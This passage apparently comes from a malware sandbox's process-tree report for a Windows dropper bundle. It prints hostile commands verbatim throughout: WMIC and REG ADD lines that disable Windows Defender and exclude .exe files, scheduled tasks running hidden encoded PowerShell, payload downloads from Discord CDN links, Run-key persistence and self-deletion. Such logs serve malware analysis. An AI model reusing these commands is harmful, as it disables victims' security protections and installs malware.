PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &8⤵PID:5552
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"9⤵PID:5436
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:5052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:5908
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:4600
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"9⤵PID:9672
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:9828
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:10168
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:11256
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"9⤵PID:11400
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:2368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:12200
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:9072
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵PID:5312
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵PID:2480
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵PID:6120
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵PID:5708
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵PID:5256
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵PID:5264
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵PID:652
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵PID:1072
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWMmynDAg" /SC once /ST 01:00:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- Creates scheduled task(s)
PID:6048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWMmynDAg"8⤵PID:5864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWMmynDAg"8⤵PID:6748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 20:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\hFKNkOV.exe\" uG /site_id 394347 /S" /V1 /F8⤵
- Creates scheduled task(s)
PID:6816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bvmcjEjDUxHOOxIZsK"8⤵PID:9132
-
-
-
-
-
C:\Users\Admin\Documents\YlhK2_p8pF01M_w923OPpswA.exe"C:\Users\Admin\Documents\YlhK2_p8pF01M_w923OPpswA.exe"5⤵
- Executes dropped EXE
PID:5064
-
-
C:\Users\Admin\Documents\WGeOvRZMf4C15sagXFJAVwda.exe"C:\Users\Admin\Documents\WGeOvRZMf4C15sagXFJAVwda.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5056
-
-
C:\Users\Admin\Documents\9lii4okD6TF1oWvouLytZbFn.exe"C:\Users\Admin\Documents\9lii4okD6TF1oWvouLytZbFn.exe"5⤵
- Executes dropped EXE
PID:4520
-
-
C:\Users\Admin\Documents\Yzk_o9_tej_A4fp_z5bmvLo4.exe"C:\Users\Admin\Documents\Yzk_o9_tej_A4fp_z5bmvLo4.exe"5⤵
- Executes dropped EXE
PID:1808 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:5412
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵PID:6160
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"6⤵PID:5892
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffbbeb64f50,0x7ffbbeb64f60,0x7ffbbeb64f707⤵PID:5560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1540 /prefetch:27⤵PID:652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1864 /prefetch:87⤵PID:4256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1824 /prefetch:87⤵PID:7260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:17⤵PID:7740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:17⤵PID:7912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:17⤵PID:7372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:17⤵PID:7316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4548 /prefetch:87⤵PID:6752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4528 /prefetch:87⤵PID:6216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2448 /prefetch:87⤵PID:7248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:87⤵PID:11436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1849973679117774336,7550561557030434858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4716 /prefetch:87⤵PID:12264
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 1808 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Yzk_o9_tej_A4fp_z5bmvLo4.exe"6⤵PID:7336
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 18087⤵
- Kills process with taskkill
PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 1808 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Yzk_o9_tej_A4fp_z5bmvLo4.exe"6⤵PID:7328
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 18087⤵
- Kills process with taskkill
PID:3336
-
-
-
-
C:\Users\Admin\Documents\PaemsLNeJ6RRL5BtdDuvS8A1.exe"C:\Users\Admin\Documents\PaemsLNeJ6RRL5BtdDuvS8A1.exe"5⤵
- Executes dropped EXE
PID:436 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BB7C.tmp\BB7D.tmp\BB7E.bat C:\Users\Admin\Documents\PaemsLNeJ6RRL5BtdDuvS8A1.exe"6⤵PID:4748
-
C:\Users\Admin\AppData\Local\Temp\BB7C.tmp\BB7D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\BB7C.tmp\BB7D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/890550701829259356/exe.exe" "exe.exe" "" "" "" "" "" ""7⤵PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\BB7C.tmp\BB7D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\BB7C.tmp\BB7D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/892465432404054046/1.exe" "1.exe" "" "" "" "" "" ""7⤵PID:6624
-
-
C:\Users\Admin\AppData\Local\Temp\3345\1.exe1.exe7⤵PID:6920
-
-
C:\Users\Admin\AppData\Local\Temp\BB7C.tmp\BB7D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\BB7C.tmp\BB7D.tmp\extd.exe "" "" "" "" "" "" "" "" ""7⤵PID:7052
-
-
-
-
C:\Users\Admin\Documents\5RXQloJuKSqDKuLgnFkrPWrx.exe"C:\Users\Admin\Documents\5RXQloJuKSqDKuLgnFkrPWrx.exe"5⤵PID:2896
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5RXQloJuKSqDKuLgnFkrPWrx.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5RXQloJuKSqDKuLgnFkrPWrx.exe" & del C:\ProgramData\*.dll & exit6⤵PID:6400
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5RXQloJuKSqDKuLgnFkrPWrx.exe /f7⤵
- Kills process with taskkill
PID:6616
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:912
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02588bdad8e7.exe3⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu02588bdad8e7.exeThu02588bdad8e7.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02966ca5c58f270.exe3⤵
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu02966ca5c58f270.exeThu02966ca5c58f270.exe4⤵
- Executes dropped EXE
PID:3960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 9325⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02f60acc90a3.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu02f60acc90a3.exeThu02f60acc90a3.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02bfe1521bcc038.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu02bfe1521bcc038.exeThu02bfe1521bcc038.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe5⤵PID:2208
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Del.doc5⤵PID:3296
-
C:\Windows\SysWOW64\cmd.execmd6⤵PID:2964
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^NZrkFJTgsCdMvCokxiUUxUBYmGUZCyshQzrAfUxHKQBByATJNifzJsTTnyLZOTMjkrVrmIWmMjlEaZSZNkkcPXDmmpwppcSQtfd$" Una.doc7⤵PID:1112
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.comRiconobbe.exe.com H7⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4104 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com H8⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4228
-
-
-
C:\Windows\SysWOW64\PING.EXEping RSSLLXYN -n 307⤵
- Runs ping.exe
PID:4152
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02c015332704.exe3⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu02c015332704.exeThu02c015332704.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\hFKNkOV.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\hFKNkOV.exe uG /site_id 394347 /S1⤵PID:4744
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:6584
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:7068
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:4680
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:8152
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:5764
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:5156
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:10176
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:10568
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:10720
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:5436
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:7824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2636
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:7764
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t 